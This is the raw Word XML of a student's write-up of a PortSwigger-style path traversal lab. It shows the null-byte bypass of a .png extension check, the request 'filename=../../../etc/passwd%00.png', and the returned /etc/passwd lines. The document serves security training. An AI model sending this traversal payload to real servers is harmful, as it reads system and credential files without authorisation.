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5633E" w14:textId="77777777" w:rsidR="00632FB4" w:rsidRDefault="00632FB4"/>
    <w:p w14:paraId="29C3EBFE" w14:textId="3893F448" w:rsidR="000E0A6D" w:rsidRPr="000E0A6D" w:rsidRDefault="000E0A6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Name :- Aakash Singh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A5CF2C" w14:textId="38E3809D" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Email:- </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00B66B6F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>aakashsinghRajput8610@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CFF55E7" w14:textId="7FA2E0C2" w:rsidR="003367B5" w:rsidRPr="003367B5" w:rsidRDefault="003367B5" w:rsidP="003367B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Path Travel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101FF668" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D"/>
    <w:p w14:paraId="72CE53F3" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>The application enforces a restriction that only files with a specific extension (e.g., .png) can be accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707795E6" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:r w:rsidRPr="00AD2D3E">
        <w:t xml:space="preserve">However, the validation is flawed and can be bypassed using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>null byte (%00) injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BE85E0" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>When %00 is included in the input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4622BCD0" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2D3E">
        <w:t xml:space="preserve">The backend interprets it as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>string terminator</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D3E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB25A9E" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2D3E">
        <w:t xml:space="preserve">Everything after %00 is ignored </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B3E2E" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2D3E">
        <w:t xml:space="preserve">This allows bypassing file extension checks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279D624C" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>Thus, an attacker can access sensitive files like /etc/passwd even when .png is enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A4E52" w14:textId="1F186C99" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:- </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Captured Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A870BCF" w14:textId="057D0693" w:rsidR="003367B5" w:rsidRDefault="00AD2D3E" w:rsidP="003367B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET /image?filename=product.png HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidR="00BD39BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F9A70" w14:textId="1505724B" w:rsidR="00AD2D3E" w:rsidRPr="003367B5" w:rsidRDefault="00AD2D3E" w:rsidP="003367B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET /image?filename=21.jpg HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A870D2A" w14:textId="7607ADC9" w:rsidR="000E0A6D" w:rsidRDefault="00AD2D3E" w:rsidP="000E0A6D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FA2EC29" wp14:editId="14A9CD59">
            <wp:extent cx="5943600" cy="3125470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="164761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18922" name="Picture 16476189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B046" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="1653A906" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="7E899841" w14:textId="77777777" w:rsidR="00D66CF5" w:rsidRDefault="00D66CF5" w:rsidP="00D66CF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="287BAA2E" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00BD39BC" w:rsidP="00AD2D3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inject Null Byte Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C7131" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>Replace:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF2D68" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>filename=product.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0DC8FF" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>With:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE4ACC9" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>filename=../../../etc/passwd%00.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B8EFB9" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>GET /image?filename</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=../../../etc/passwd%00</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>.png HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709576F5" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>The server responds with contents of /etc/passwd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101786F" w14:textId="77777777" w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E" w:rsidRDefault="00AD2D3E" w:rsidP="00AD2D3E">
      <w:r w:rsidRPr="00AD2D3E">
        <w:t>root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D3E">
        <w:br/>
        <w:t>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D3E">
        <w:br/>
        <w:t>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F903D59" w14:textId="77777777" w:rsidR="00BD39BC" w:rsidRPr="00BD39BC" w:rsidRDefault="00BD39BC" w:rsidP="00BD39BC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25CFEE6F" w14:textId="643761C2" w:rsidR="000E0A6D" w:rsidRDefault="00AD2D3E" w:rsidP="000E0A6D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAE3DFF" wp14:editId="5BF65864">
            <wp:extent cx="5943600" cy="3025775"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="18428019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01900" name="Picture 184280190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87B36" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="1F1B3C2D" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="0A6A9FF4" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="52093CFE" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="368996B7" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="4B61DD13" w14:textId="5371B9A8" w:rsidR="000E0A6D" w:rsidRPr="000E0A6D" w:rsidRDefault="00C84298" w:rsidP="000E0A6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3:- </w:t>
      </w:r>
      <w:r w:rsidR="000E0A6D" w:rsidRPr="000E0A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analyze Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046AF633" w14:textId="43CF033F" w:rsidR="000E0A6D" w:rsidRPr="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D">
      <w:r w:rsidRPr="000E0A6D">
        <w:t xml:space="preserve">The server responded with the contents of the </w:t>
      </w:r>
      <w:r w:rsidR="00AD2D3E" w:rsidRPr="00AD2D3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>../../../etc/passwd%00.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9ED518" w14:textId="694E0CB8" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="233170FA" w14:textId="4310522F" w:rsidR="000E0A6D" w:rsidRDefault="00AD2D3E" w:rsidP="000E0A6D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="642DAA1E" wp14:editId="18B1116E">
            <wp:extent cx="6591300" cy="3025775"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="14460084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08467" name="Picture 14460084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44E5" w14:textId="76F3780E" w:rsidR="000E0A6D" w:rsidRPr="00C84298" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C84298">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:- Lab solved successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736961B3" w14:textId="182B7B0A" w:rsidR="000E0A6D" w:rsidRDefault="00AD2D3E" w:rsidP="000E0A6D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="571BFC55" wp14:editId="0CFE73E7">
            <wp:extent cx="5943600" cy="3108960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6793198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19808" name="Picture 67931980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D119F" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="7430137A" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D"/>
    <w:p w14:paraId="7C6496E9" w14:textId="6C7EC9F6" w:rsidR="000E0A6D" w:rsidRPr="000E0A6D" w:rsidRDefault="000E0A6D" w:rsidP="000E0A6D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The application successfully returned sensitive system file contents, confirming that directory traversal is possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C51DFE" w14:textId="77777777" w:rsidR="000E0A6D" w:rsidRDefault="000E0A6D"/>
    <w:sectPr w:rsidR="000E0A6D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EFF85" w14:textId="77777777" w:rsidR="00306602" w:rsidRDefault="00306602" w:rsidP="000E0A6D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2AFA3308" w14:textId="77777777" w:rsidR="00306602" w:rsidRDefault="00306602" w:rsidP="000E0A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0E843" w14:textId="77777777" w:rsidR="00306602" w:rsidRDefault="00306602" w:rsidP="000E0A6D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3D52F6B9" w14:textId="77777777" w:rsidR="00306602" w:rsidRDefault="00306602" w:rsidP="000E0A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4D83E" w14:textId="342289A9" w:rsidR="000E0A6D" w:rsidRPr="000E0A6D" w:rsidRDefault="000E0A6D">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="000E0A6D">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">                                       LAB Path Travel PostSwigger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3ADF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="950C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E25015"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1794E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A86027"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="043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237185">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1407653603">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1086149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A6D"/>
    <w:rsid w:val="000E0A6D"/>
    <w:rsid w:val="002A4AB7"/>
    <w:rsid w:val="00306602"/>
    <w:rsid w:val="003367B5"/>
    <w:rsid w:val="00360DA7"/>
    <w:rsid w:val="003702B4"/>
    <w:rsid w:val="0048587B"/>
    <w:rsid w:val="005339E9"/>
    <w:rsid w:val="00551099"/>
    <w:rsid w:val="00632FB4"/>
    <w:rsid w:val="0078544B"/>
    <w:rsid w:val="007F20CE"/>
    <w:rsid w:val="00920DCD"/>
    <w:rsid w:val="00AB7DE4"/>
    <w:rsid w:val="00AD2D3E"/>
    <w:rsid w:val="00B1610C"/>
    <w:rsid w:val="00B52792"/>
    <w:rsid w:val="00BD39BC"/>
    <w:rsid w:val="00C84298"/>
    <w:rsid w:val="00C908E2"/>
    <w:rsid w:val="00D66CF5"/>
    <w:rsid w:val="00E14959"/>
    <w:rsid w:val="00F12A86"/>
    <w:rsid w:val="00F87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4096D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{13466876-B41D-4F35-9832-07D29B331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A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A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A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A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A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A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A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A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A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A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A6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0A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0A6D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E0A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0A6D"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E0A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0A6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12A8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aakashsinghRajput8610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singh rajput</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>vishal singh rajput</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-28T10:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-28T12:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>